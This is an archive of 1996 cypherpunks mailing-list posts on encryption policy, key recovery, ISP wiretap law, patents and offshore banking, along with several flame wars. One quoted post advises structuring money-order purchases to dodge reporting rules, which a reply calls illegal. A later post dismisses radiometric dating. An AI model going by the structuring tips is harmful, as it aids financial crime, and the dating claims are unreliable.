inspect the books
>                   of shell branches wherever they are kept. "In no case
should access to
>                   these books be protected by secrecy requirements in the
country that
>                   licenses the shell branch," it says.


Don Weightman  
dweightman@radix.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Tue, 8 Oct 1996 16:28:25 +0800
To: adamsc@io-online.com
Subject: RE: WINDOWS NT ????
Message-ID: <199610080602.QAA08023@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


The machine CAN have a floppy...but it must NOT be bootable. If the 
floppy is able to be used to boot, than it is not C2 complient.

Remember C2 is not out of the box. Being C2 certified means that the 
machine can be MADE to fulfil orange book requirements, not that it 
is automatically secure. A machine can have a floppy, but it must 
than subsequently be removed or unable to be booted before it is C2.

This is not just floppies, but CD Rom drives etc as well. It must be 
configured to boot from ONLY the secured devices
Craig
> 
> Now.  They used to claim C2 for a machine w/floppies.  Now they don't.
> 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 9 Oct 1996 08:59:19 +0800
To: stewarts@ix.netcom.com
Subject: Re: PGP implements Key Recovery today!
In-Reply-To: <199610081636.MAA10922@attrh1.attrh.att.com>
Message-ID: <Pine.SUN.3.91.961008155606.4160C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I was actually working on a message saying something similar, under the 
working title of "Trusted First Parties". 

The idea is to generate a separate key pair to be used for recovery
purposes, and then place the private key in a trusted, off-line location
(much easier to arrange than if the key is to be kept on-line). 

The key should probably be encrypted using a symmetric algorithm keyed of
a pass phrase, but since the pass phrase will only ever be used once, it's
the kind of thing that might end up being forgotten, especially in those
'what's that tree doing in the middle of my machine room?' key recovery 
moments.

Because the  TFP key is protected other keys, the key length should be 
such as to give a work factor equal or greater than that needed to force 
the keys that will be protected by it. 

TFP can be used to weaken forward secrecy by encrypting the ephemeral
session key under the TFP key and sending it with the message stream. You 
don't have real forward secrecy, because  if the TFP key is cracked,all 
prior session keys will be exposed; however this setup is still somewhat 
better than straight RSA key exchanges using your regular key, as the 
private TFP key is less exposed.

Simon 
 
---
    Huge taxi cabs now! Huge spelling cuts now! Balance the budgie now!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@miron.vip.best.com
Date: Wed, 9 Oct 1996 14:40:47 +0800
To: cypherpunks@toad.com
Subject: Tim May is a fine person.
Message-ID: <199610082321.QAA01224@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May is a fine person. You people should not
be sending out some many negative vibes. We all
owe Tim a gread debt for his help an advancing cryptography.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 9 Oct 1996 12:06:00 +0800
To: cypherpunks@toad.com
Subject: Re: Put up or shut up
Message-ID: <199610082336.QAA24221@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:45 PM 10/6/96 -0700, Steve Schear wrote:
>Using, as you say, out-of-the-shower ideas to re-argue settled caselaw are
>almost always fruitless.  Since the intents of the ranters are generally
>anarchistic, why even involve the law and justice. Even if their ideas have
>good philosophical basis there is little hope for the broad changes they
>seek in the political or legal landscape (given the powerful and selfish
>interests of those inside and outside the beltway) without a great trauma
>to the system.  

Maybe you're missing the point?  Even if you accept the idea of wiretapping 
telephone lines, one of the things that _isn't_ settled is how law is going 
to start treating ISP's.  That, let me point out, IS NOT settled law, and in 
fact it hasn't really even started, so those lawyers who have a knee-jerk 
tendency to accept precedent don't have any precedent to accept!  (unless, 
of course, they "pre-accept" the assumption that what the government can do 
WRT ISP's is somehow identical to what they do with telephones.)

I see two broad and conflicting ideas of what the government can do in a 
search. The first is a classic search warrant, which simply allows the cops 
to go in and look around, for a comparatively limited amount of time, 
informing the person searched,taking a few things, and then _leaving_.  
Period.  Generally, they can't sneak in, they can't hide in the closet for 
weeks or months, etc.

Without effective challenge by telephone companies (which have no motivation 
to challenge it) there has been a very different precedent set, that of the 
wiretap:  No informing the target at the beginning, indefinite time limit, 
and not necessarily even informing those tapped after it's over.  _VERY_ 
different.

The question is, which of these precedents should control ISPs?  Police, 
obviously enough, would probably want to insinuate into the game with the 
assumption that the latter scenario rules.  After all, they're talking about 
wires and electricity, right?  That sure sounds like wiretapping, right?

I contend that an ISP should be entitled to enter into a contract with his 
customers in a way which obligates him to structure his business to minimize 
his ability to cooperate with police when given a search warrant.  One 
example which occurred to be months ago (which, amazingly, shut up even 
Black Unicorn!) was that the ISP could agree to encrypt any email received 
with the user's public key (or another public key whose private key is known 
only to the user) so that useful information is only ephemerally available 
in the ISP's computers.  A few seconds after it arrives, it's been encrypted 
and is "gone" from the standpoint of the ISP.  Only the user, when he logs 
in and after he downloads the encrypted files, can decrypt them.

But that raises another question.  Suppose the government, not liking this 
situation, decides to not merely do a search, but in fact order the ISP to 
turn off the encrypt-on-receipt feature?  And more particularly, to do so 
without telling the customer?  What if, in fact, they order the ISP to LIE 
about this?  Or what if they order the ISP to change his system's software 
to store away an unencrypted version of the messages so as to bypass this 
protection?

My answer to all this should be obvious:  There is a vast difference between 
doing a "search" and, in effect, turning an ISP into a slave who has to say 
"how high?"  when the government says "jump."  Arguably the ISP has to 
consent to a search; I don't think he has to change his business practices 
in order to make those searches more useful.  And I think he's entitled to 
make promises to his customers that he's obligated to keep, even when the 
government would want him to break them.

However, I won't claim that this matter has been settled; in fact, it's 
probably an issue that never came up before, in any court.  That's why I 
think it's important to ensure that ISP-law does not follow is the bad 
precedents set by wiretap law.  



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 9 Oct 1996 18:05:21 +0800
To: cypherpunks@toad.com
Subject: Re: Recent Web site cracks
In-Reply-To: <199610081636.MAA10912@attrh1.attrh.att.com>
Message-ID: <9VZHVD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


stewarts@ix.netcom.com writes:
> The DOJ and CIA sites were actually cracked; don't know the mechanisms.

They used firewalls that are known to be easily crackable.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 9 Oct 1996 10:09:25 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: new mailing list: solving spam problem
In-Reply-To: <199610011904.MAA24104@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.961008170658.25607A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Oct 1996, Vladimir Z. Nuri wrote:

> a new list dedicated to trying to solve the problem of spam
> just popped up, and may be of interest to some here--

there wouldn't be a need for this if you would quit sending those damned 
Tim May daily warnings. :)
 
Just a daily warning about Vulis. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 9 Oct 1996 10:25:34 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Public Apology (this list is a joke)
In-Reply-To: <2qF7uD2w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961008171241.25607B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 2 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Dave Temple <dtemple@ashland.edu> writes:
> > 	I joined this list knowing next to nothing about cryptography.  I
> 
> You're not alone. Timmy May (fart) and many other spammers on this list
> still know next to nothing about cryptography, despite posting dozens of
> inane rants every day.

That's right Dave, and Vulis here will keep you in good company as the
only crypto he knows is how to setup a spam script to remail to daily 
flames that project his sexual dysfunction onto others.

A daily warning about Vulis. :)

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 9 Oct 1996 10:54:05 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: new mailing list: solving spam problem
In-Reply-To: <199610011904.MAA24104@netcom11.netcom.com>
Message-ID: <Pine.SUN.3.91.961008171621.25607C-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


OOps! That last message was aimed at "Dr" Vulis, not at Vladimir. Major 
appologies.  Sorry. :(

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thierry van Herwijnen <t.vanherwijnen@rijnhaave.net>
Date: Wed, 9 Oct 1996 04:30:49 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19961008162912.006ab93c@mail.rijnhaave.nl>
MIME-Version: 1.0
Content-Type: text/plain


           ,,,
           (o-o)
--------.oOO--(_)--OOo.--------------------------------------------------
ing. Thierry van Herwijnen        \  t.vanherwijnen@rijnhaave.net
Consultant                         \ 
                                    \  thierry@herwijnen.com 
Rijnhaave Internet Services          \ 
Louis Braillelaan 6                   \  http://www.rijnhaave.net  
2719 EJ  Zoetermeer                    \
The Netherlands                         \
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 15:06:26 +0800
To: Chris Adams <adamsc@io-online.com>
Subject: Re: Voice Stress Analysis of Debates?
In-Reply-To: <19961007204519812.AAC220@GIGANTE>
Message-ID: <325AFFD3.7984@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Adamsc wrote:
> On Sun, 06 Oct 1996 15:28:40 -0800, jim bell wrote:
> > >BTW, did anyone notice that some of the evening news anchors are
> > >imaged via a camera/DSP to render as more youthful (e.g., removing
> > >facial wrinkles)?

> >Really?  Where'd you hear this? I suppose it's not beyond the realm
> >of possibility, but that would be rather sophisticated programming,
> >particularly in real-time.

> One of the big anchors admitted it.  However it was only possible in
> the studio.   Might have even been a contrast-lowering gadget.

Re: "It was only possible in the studio": Probably only on Tuesday or 
Wednesday, since they have to take it to the bowling tournament on 
Thursday.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 14:46:28 +0800
To: cypherpunks@toad.com
Subject: Re: Voice Stress Analysis of Debates?   [NOISE]
In-Reply-To: <199610080403.VAA08661@dfw-ix9.ix.netcom.com>
Message-ID: <325B01E9.6FB0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart wrote:

[some text deleted]

> [***Did you ever notice how much George Bush _sneered_ when he was
> lying?  Clinton's polite enough to smile when he's talking.]

Actually, Bush didn't always sneer when he was lying, only when he was 
about to screw you, too.  Bush doesn't enjoy sex with the hoi polloi.  
On the other hand, Clinton....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Wed, 9 Oct 1996 05:47:29 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: "European Union Bank"
In-Reply-To: <199610071740.NAA28178@jekyll.piermont.com>
Message-ID: <Pine.GSO.3.93.961008190136.14780B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Mon, 7 Oct 1996, Perry E. Metzger said:

> Or, perhaps, they are just a way for the IRS to get the names of lots
> of people interested in offshore banking. Or maybe not. Who knows?

According to one offshore magazine European Union Bank is a very bad
choice for Internet banking. What they did was they assigned they named
Lord Mancroft who sits in the UK's House of Lords as chairman of the bank.
Only thing Lord Mancroft himself did not know a thing about it, although
the bank marketing materials had a letter of welcome supposedly from that
prominent person. So he is thinking of taking legal action against the
bank.

Also their correspondent bank in UK wants to terminate their relationship
with EUB because of these problems.

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 9 Oct 1996 14:18:08 +0800
To: cypherpunks@toad.com
Subject: Have you had your privacy invaded? Be on Oprah!!!
Message-ID: <Pine.SUN.3.91.961008191326.19545I-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain






---------- Forwarded message ----------

Date: Tue, 8 Oct 1996 15:02:14 -0500
From: marsha-w@uiuc.edu (Marsha Woodbury)
Subject: Have you had your privacy invaded?

Hi--
I am looking for someone who lost a feeling of privacy--
I need a "victim" to tell a story about how he or she had
her privacy invaded and how he/she felt about it.

The Oprah Show is looking for a real-life example of
someone whose name got on a strange list, or whose unlisted
phone number was given out, or whose medical records were
made known to insurance companies--anything like that.

The show is next Wed. and they will pay to get you
there if you have a good story to tell (and it had better
be a true story!!)

Call Dana Newton of the Show if you have story to tell...

312-633-0808

Thanks!

Marsha Woodbury, Ph.D.        Director of Information Technology
Graduate School of Library and Information Science   UIUC
Chair, CPSR           http://alexia.lis.uiuc.edu/~woodbury/
Work: 217- 244-4643      FAX: 217- 244-3302     marsha-w@uiuc.edu

CPSR's Annual Meeting and Conference, "Communications Unleashed"
will be held Oct 19-20 at Georgetown University in
Washington DC. For information or to register, see http://www.cpsr.org
or e-mail cpsrannmtg@cpsr.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 15:09:23 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: Put up or shut up!
In-Reply-To: <v02130501ae7fc9432758@[10.0.2.15]>
Message-ID: <Pine.SUN.3.94.961008195328.22095J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, Steve Schear wrote:

> >At 12:44 AM 10/7/96 -0700, James A. Donald wrote:
> >
> >>The reason that no one publishes "How to" step by step instructions for
> >>discretely expatriating your money is exactly the same reason as the reason
> >>that nobody publishes "How to" step by step instructions for buying dope.
> >>
> >>For example one ever popular method of expatriating money, (or repatriating
> >>it to preferred politicians), is by means of a friendly cattle futures
> >>broker.
> >
> 
> After establishing your offshore banking account you can move moderate
> amounts of money there from the U.S. by using private money order or
> travellers checks.  Most money transmitters and banks won't ask for ID or
> that you fill out the payorpayee in the process.  If you live in a large
> city there should be enough outlest to enable you to transport
> $10,000s/month without seeing the same merchant twice in same month.  It'll
> just look like you don't have a checking account and are paying you're
> monthly bills.
> 
> The advantage of these instruments, of course, is that they are relatvely
> safe from loss.

The disadvantage is that it's illegal.
It's considered structuring to avoid reporting requirements.

Most vendors will require identification for amounts over $7,500.00
American express started this and others followed suit.

> 
> As was pointed out earlier on the list, you can use FedEx to send int'l
> parcels w/o providing identification.
> 
> -- Steve
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 9 Oct 1996 12:40:17 +0800
To: John Young <jya@pipeline.com>
Subject: Offshore Group...
In-Reply-To: <1.5.4.16.19961008172410.0b77114e@pop.pipeline.com>
Message-ID: <Pine.SUN.3.94.961008203513.22095O-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 8 Oct 1996, John Young wrote:

> Anybody got a copy of the Offshore Group's agreement? Whither EUB?

Working on it.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apteryx@super.zippo.com (Mark Heaney)
Date: Wed, 9 Oct 1996 10:34:24 +0800
To: cypherpunks@toad.com
Subject: (fwd) Big Brother vs. Cypherpunks
Message-ID: <325a9b6b.22242698@super.zippo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 07 Oct 1996 17:13:11 -0400, John Young <jya@pipeline.com> wrote
>   Time, October 14, 1996, p. 78.
>
>   The Netly News
>
>   Joshua Quittner
>
>   Big Brother vs. Cypherpunks

[snip]

>  Are they right? It's hard to know whom to believe in this
>   cloak-and-dagger debate. Civil libertarians tend to gloss
>   over the fact that the world is full of bad people with
>   crimes to hide. The software industry -- which makes 48%
>   of its profit overseas -- is clearly less concerned with
>   privacy than with losing foreign sales. And it may be no
>   accident that the Administration chose to start making
>   concessions the same week an influential software CEO --
>   Netscape's Jim Barksdale -- excoriated Clinton's
>   cryptopolicy and endorsed Bob Dole.

Oh my, you mean diffferent sides of a controverial topic are saying
different things? What's a po reporter to do? 

>   The issue is too complex -- and too important -- for
>   political gamesmanship. It will never get sorted out
>   until somebody starts playing it straight.

Translation: I'm a lazy journalist who considers any controversy that
requires more than just asking the two sides about it as too complicated to
understand, and my editor wants me to dumb everything down anyway.

I guess it is hard to turn a large number of mathematical, technical, legal
and philosophical issues into no more than 3-syllable words, 15 word
sentences, 5 line paragraphs filling 1 column of a magazine. 

Maybe this reporter should have viewed the article on lattice crypto in The
Economist a couple of months back It's not impossible to explain the basic
issues at stake if you are willing to do some research and not insult the
intelligence of your audience. 

Of course, Time would be unlikely to print such an article that precludes
the semi-literate from understanding it. Besides which, I'm sure that there
is something *important* happening to Brad Pitt or Julia Roberts that needs
to be covered first.

Mark

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMlq+X936bir1/qfZAQEDcwMAwwm1PPpICSK15YT/m6Cu1ldDeCZGG2VC
7MaJZdBbuoUkwR/6k4LsuDwqFl6c2jIEJbup88cH/yLsztDUvenGpetNgAiByCoN
gYg/xgn5edTOu4eKb+ufh/yoZbf/cXOL
=z31E
-----END PGP SIGNATURE-----

Mark Heaney    finger snipe@starburst.cbl.cees.edu for public key
PGP Fingerprint= BB D8 9B 07 51 87 05 AC  47 7B F2 4F A6 AB 1A CD   
-----------------------------------------------------------------
   Vote against government        ***        Vote Libertarian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rschlafly@attmail.com (Roger  Schlafly)
Date: Wed, 9 Oct 1996 15:27:45 +0800
To: cypherpunks@toad.com
Subject: Stanford patents
Message-ID: <rschlafly2830357240>
MIME-Version: 1.0
Content-Type: text/plain


> Declan McCullagh <declan@eff.org> writes:
> >You'll have trouble doing a successful boycott of RSA. What, you won't
> >use Netscape Navigator or PGP?
> 
> Actually RSA is not a hard target for people like us to threaten.  The
> Diffie-Hellman patent expires in 210 days.  Cylink is prevented from taking
> legal action against anyone for violating this patent while the current
> lawsuit is being decided.  When Diffie-Hellman expires ElGamal is available
> for use for free.  So the best threat one can make against RSA is to directly
> challenge their revenue stream: start working on making ElGamal an available
> option in all systems which use RSA.

A couple of minor corrections.  Diffie-Hellman doesn't expire until
Sept. 6, 1997.  Cylink can sue anyone at any time, for infringement
up to 6 years in the past.  It is not likely to do so while its case
against RSADSI is pending, because most of the infringers are RSADSI
customers who have been indemnified by RSADSI.  ElGamal won't be free
of patent claims until Hellman-Merkle expires, a month after Diffie-
Hellman.

ElGamal/DSA is an attractive alternative to RSA, and ought to be more
widely used.

More information about the patent lawsuit can be found at:

	http://bbs.cruzio.com/~schlafly#pkpsuit

There are some hearings scheduled, but nothing of great significance
has been decided so far.

Roger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 9 Oct 1996 15:26:07 +0800
To: cypherpunks@toad.com
Subject: Re: 2Re: Best-of-Crypto
In-Reply-To: <v03007804ae80d20d8060@[207.167.93.63]>
Message-ID: <Pine.3.89.9610082058.A5251-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain





On Tue, 8 Oct 1996, Timothy C. May wrote:
> I read the full list, so I don't keep these URLs bookmarked or handy.
> Arachelian posts to Cypherpunks regularly, so contact him from those
> messages. Blossom is involved with his company, "Infosec," so some
> combination of these words in a search engine should turn up something.

Eric Blossom is eb@comsec.com. His URL is http://www.comsec.com/ check 
out his nifty bump-in-the-cord 3DES phone encryption device.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 9 Oct 1996 15:23:42 +0800
To: deeb@x.org
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK) [RANT]
In-Reply-To: <9610081444.AA23161@hydra.cde.x.org>
Message-ID: <325B287B.A60@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Stephen Humble wrote:
> attila <attila@primenet.com> sez:
> > why would any rational individual espouse ANY cause he thought was
> > wrong!

> Biblical creationism is "wrong": there's ample evidence that the Earth
> is *much* more than 6000 years old.  Yet lots of seemingly rational
> people believe biblical creationism.

Which years?  The very definition of the Christian God encompasses all 
ultimate things, including the ability to make the Earth look like it's 
billions of years old, with *all* "evidence" in place.  There are some 
fascinating videos from Mt. St. Helens(?) which suggest possibilities 
not found in the common literature....

There can be only one point here (outside of a purely religious 
discourse), and that is that religion is a matter of faith, not of 
physical proofs.  Those spiritual beings can walk in your world (by 
definition), but you can't walk in theirs, or at least you can't prove 
it to the average cypherpunks subscriber.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Wed, 9 Oct 1996 15:32:30 +0800
To: cypherpunks@toad.com
Subject: Govt wants to read your e-mail
Message-ID: <2.2.32.19961009043345.002e8ddc@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


In case you haven't heard....


"AN ALLIANCE OF 11 SOFTWARE AND HARDWARE
COMPANIES HAS JUST ANNOUNCED ITS FORMATION
TO DEVELOP KEY-RECOVERY SOLUTIONS FOR
ELECTRONIC ENCRYPTION, a crucial component of the
Clinton administration's latest plan to loosen the export of
encryption technology.  Announced yesterday, the administration's
plan gives exporters of encryption or encrypted software a two-
year window starting Jan. 1, 1997, to build what the
administration calls 'key recovery' into their products.  [The
alliance will] develop systems that will give the [U.S.] government
what it wants, which is access to suspicious encrypted messages,
so that compliant software companies will be able to get export
licenses for hard-to-crack encryption codes.  . . .

" 'The fact that 56-bit DES [a type of encryption] will be
available from significant sources is going to jump-start electronic
commerce,' said Ken Kay, executive director of the Computer
Systems Policy Project, a public policy group comprised of 12
computer industry CEOs.  . . .  While Gore directly stated
yesterday that domestic use of encryption will remain
unregulated, the double standard for domestic and international
products might discourage U.S. companies from developing two
different versions, leaving U.S. and Canadian customers with the
same products that the federal government has deemed safe to
ship overseas." ["C/Net" Oct. 2; also covered by "Reuter" and
"Dow Jones"]

                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing needs.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: matthew@itconsult.co.uk (Matthew Richardson)
Date: Wed, 9 Oct 1996 10:08:04 +0800
To: rich@c2.org
Subject: Re: Seeking help on WordPerfect 6.1 cracks
In-Reply-To: <Pine.GUL.3.95.961007132450.9362A-100000@Networking.Stanford.EDU>
Message-ID: <memo.961008220119.228A@itconsult.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Have you tried AccessData??

email: info@accessdata.com

Best wishes,
Matthew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omegaman@bigeasy.com>
Date: Wed, 9 Oct 1996 14:34:40 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: yellow journalism and Encryption
In-Reply-To: <v03007807ae7f9faefb54@[204.179.128.206]>
Message-ID: <Pine.LNX.3.95.961008220837.200B-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Vinnie Moscaritolo wrote:

> The following is an example of the asswipe media's attempt to write about
> encryption.
> 
> 
> http://www.sfgate.com/cgi-bin/examiner/article.cgi?year=1996&month=10&day=06&art
> icle=BUSINESS2814.dtl

Did I miss something?

Of the many columns and articles I've read recently, this is one of the
best and most concise so far.  Compare it to, say, the "Netly News" column
jya posted earlier.  

> At stake in the policy battle are software exports worth millions, Fourth
> Amendment rights Americans have enjoyed for centuries, and innocent lives
> that the good guys say might be saved if they're able to keep snooping on
> the bad
> guys.

What export controls have to do with keeping an eye on "the bad guys" no one
really knows.  Unless the intent is control of domestic encryption of course.

The only major point that I see missed is the key size limitation
of 56 bits and the nature of the agreement itself to extend or rescind
export licenses based on a future key recovery plan which satisfies government
officials.

Fifty-six bits is simply not secure.  Abate missed this fundamental point.

Furthermore, that the only way for individuals and companies to maintain
security for "the bad people(including governments)" is through secure,
virtually unbreakable (large key length) encryption.  A back door and a
relatively pitiful key length limitation provide no real security.

Furthermore, the agreement itself for 2 year conditional licenses is
curious.  There are many obvious questions.  What will satisfy the
government or is this just a ruse?  Are import restrictions the next step?  

The whole nature of the compromise is very strange indeed and I would be
most interested to find out the thinking behind it.

> "Wiretapping is the main issue," said Stewart Baker, former general counsel
> of the National Security Agency, the CIA's code-breaking and eavesdroping
> cousin.

This seems like a statement that would have come from the other side of the
debate.  

> Exports are the odd piece in this policy puzzle. The U.S. government has no
> authority to regulate secret codes within U.S. borders. But a law passed
> after World War II put secret codes in the same category as munitions,
> products that
> cannot be exported without a license.
> 
> The government has used this export-licensing authority to indirectly
> control code-making software here. Most high-tech firms are unwilling to
> sell two sets of encryption products, one full- and the other
> half-strength, so they have
> sold weak encryption products everywhere.

While this may seem obvious to those who have watched and studied the issue
for years, the layman reading Abate's column gets a distillation of the
issue that I have not seen in other popular media.

In just two paragraphs, he explains to the unitiated reader the origin and
authority behind export controls on encryption as well as their usage by the
government to control local creation of encryption  -- a point that is
almost always missed.

> To give investigators the keys to every code might be too much temptation
> and a threat to civil liberties. To deny
> investigators the keys may handcuff them in the fight against increasingly
> sophisticated and deadly forms of crime.

Is this the statement which bothers you?  I simply read it as a summary of
both sides of the debate not as an opinion statement


_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Wed, 9 Oct 1996 16:19:51 +0800
To: Stephen Humble <deeb@x.org>
Subject: Re: Missionaries (was: "Mormon Asshole?" re: GAK)
In-Reply-To: <9610081444.AA23161@hydra.cde.x.org>
Message-ID: <Pine.3.89.9610082242.A15341-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 8 Oct 1996, Stephen Humble wrote:

> attila <attila@primenet.com> sez:
> > why would any rational individual espouse ANY cause he thought was
> > wrong!
> 
> Biblical creationism is "wrong": there's ample evidence that the Earth
> is *much* more than 6000 years old.  Yet lots of seemingly rational
> people believe biblical creationism.
> 

The "evidence" is based upon the belief that such techniques as carbon 
dating and statistical radio active half life bearing rocks give an 
accurate measurement of time as we know it. Geologically speaking, we are 
just pissing in the fan to see which way it blows and calling it good. 
And, considering the number of text books and egos to be restrung if it 
was ever conclusively proven wrong would be devastating to say the least to 
the current crop of scientists.

As someone once said (I believe it was Samuel Clemens), "There are lies, 
damn lies, and statistics."

